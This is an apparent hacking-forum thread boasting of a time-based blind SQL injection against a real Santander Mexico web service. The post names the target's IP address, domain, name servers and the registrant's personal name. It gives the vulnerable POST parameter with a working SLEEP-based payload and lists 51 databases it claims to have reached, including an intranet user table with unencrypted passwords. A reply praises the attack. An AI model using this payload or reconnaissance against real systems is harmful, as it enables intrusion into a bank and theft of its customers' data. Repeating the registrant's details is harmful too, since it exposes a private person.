AlteredCarbon Posted August 24, 2012 Share Posted August 24, 2012 This is the hidden content, please Sign In or Sign Up The Santander Group is a Spanish banking group centered on Banco Santander, S.A. and one of the largest banks in the world in terms of market capitalisation. According to Forbes Magazine Global 2011, it was the 13th largest company in the world. It originated in Santander, Cantabria, Spain. This is the hidden content, please Sign In or Sign Up Information Gathering: IP: 200.57.186.99 Domain: servicios.santander.com.mx Registrant: Name: JUAN SANTOS ESPINOZA PEREZ City: Queretaro State: Queretaro Country: Mexico Name Servers: DNS: dns3.santander.com.mx 170.169.33.27 DNS: gfsm.santander.com.mx 170.169.97.34 DNS: gfsm2.santander.com.mx 170.169.130.46 Vulnerability: Place: POST Parameter: apellido Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload:apellido=1'ANDSLEEP(5)AND'jHJK'='jHJK&cel=1&correo=1&cp=1&estado=elige&fon1=1&nombre=bot This is the hidden content, please Sign In or Sign Up Exploiting this we can find 51 databases with, clients, mail lists, and a intranet user and password without encryption the database is: ope_intranet_core and the table: intra_user Data Bases: [*] Accionista [*] aclaracion [*] bajassupernet [*] bancapriv [*] calidad_privada [*] clientespremier [*] db_calidad [*] dbCalidad_bkp [*] defensor [*] defensor1 [*] devfactor [*] encuesta_cc [*] encuestacalidad [*] encuestacalidad_1 [*] encuestacalidad_2 [*] epcuesta_bd [*] faqsstander [*] fideicomiso [*] formulario_pyme [*] information_schema [*] mapas [*] mysql [*] ope_intranet_core [*] premier_select [*] santanderp [*] santander_tasa0 [*] snt_baja [*] snt_chat [*] snt_confirming [*] snt_defensor [*] snt_fiierep [*] snt_hipo [*] snt_pemex [*] snt_exportacion [*] snt_snomi [*] snt_sorteo2010 [*] snt_sorteq [*] snt_survey [*] snt_tdc [*] snt_queja [*] snt_dicci [*] snt_aclara [*] sorteo [*] superplay [*] superplay_facebook [*] superplay_masalle [*] superplay_tecdf [*] superplay_tecmty [*] tanquecitos [*] techdesign [*] test The vulnerability was report and maybe patched CorruptedByte's Link to comment Share on other sites More sharing options...
Spectretronic Posted September 14, 2012 Share Posted September 14, 2012 Re: Santander PWNED [Time-Based Blind SQLi] Muy bueno gracias karnal al sobres mijo hay te ves pillo en orogullo Link to comment Share on other sites More sharing options...
Recommended Posts